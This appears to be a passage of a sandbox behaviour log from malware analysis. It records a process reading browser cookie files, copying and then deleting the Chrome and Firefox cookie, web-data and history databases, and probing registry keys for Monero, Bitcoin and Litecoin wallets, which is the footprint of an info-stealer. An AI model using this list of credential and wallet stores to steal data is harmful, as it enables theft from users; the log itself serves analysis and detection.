File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt, size = 598, size_out = 598 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt, size = 196, size_out = 196 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt, size = 543, size_out = 543 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt, size = 272, size_out = 272 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt, size = 118, size_out = 118 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt, size = 823, size_out = 823 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt, size = 206, size_out = 206 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt, size = 108, size_out = 108 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt, size = 104, size_out = 104 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt, size = 178, size_out = 178 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt, size = 215, size_out = 215 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt, size = 169, size_out = 169 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, size = 1026, size_out = 1026 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, size = 1026, size_out = 1026 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, type = file_attributes False 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Cookies, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, type = file_attributes True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, size = 100, size_out = 100 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-journal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, size = 1024, size_out = 1024 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-journal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, size = 1024, size_out = 1024 True 1
Fn
Data
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp True 1
Fn
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\cookies.sqlite, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, type = file_attributes True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, size = 100, size_out = 100 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-journal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, size = 32768, size_out = 32768 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal, type = file_attributes False 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm, type = file_attributes False 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp, size = 32768, size_out = 32768 True 2
Fn
Data
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm True 1
Fn
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal True 1
Fn
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp True 1
Fn
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Web Data, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, type = file_attributes True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, size = 100, size_out = 100 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-journal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, size = 2048, size_out = 2048 True 4
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-journal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp, size = 2048, size_out = 2048 True 1
Fn
Data
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp True 1
Fn
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Web Data, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, type = file_attributes True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, size = 100, size_out = 100 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-journal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, size = 2048, size_out = 2048 True 4
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-journal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp, size = 2048, size_out = 2048 True 1
Fn
Data
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp True 1
Fn
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\History, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, type = file_attributes True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, size = 100, size_out = 100 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-journal, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, size = 4096, size_out = 4096 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-journal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-wal, type = file_attributes False 1
Fn
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp, size = 4096, size_out = 4096 True 3
Fn
Data
File Delete filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\monero-project\monero-core False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\monero-project\monero-core, value_name = wallet_path, data = 0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt, value_name = strDataDir, data = 0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\BitcoinGold\BitcoinGold-Qt False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\BitcoinGold\BitcoinGold-Qt, value_name = strDataDir, data = 0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\BitCore\BitCore-Qt False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\BitCore\BitCore-Qt, value_name = strDataDir, data = 0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Litecoin\Litecoin-Qt False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Litecoin\Litecoin-Qt, value_name = strDataDir, data = 0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\BitcoinABC\BitcoinABC-Qt False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\BitcoinABC\BitcoinABC-Qt, value_name = strDataDir, data = 0 False 1
Fn
Thread 0xacc
1 0
»
Category Operation Information Success Count Logfile
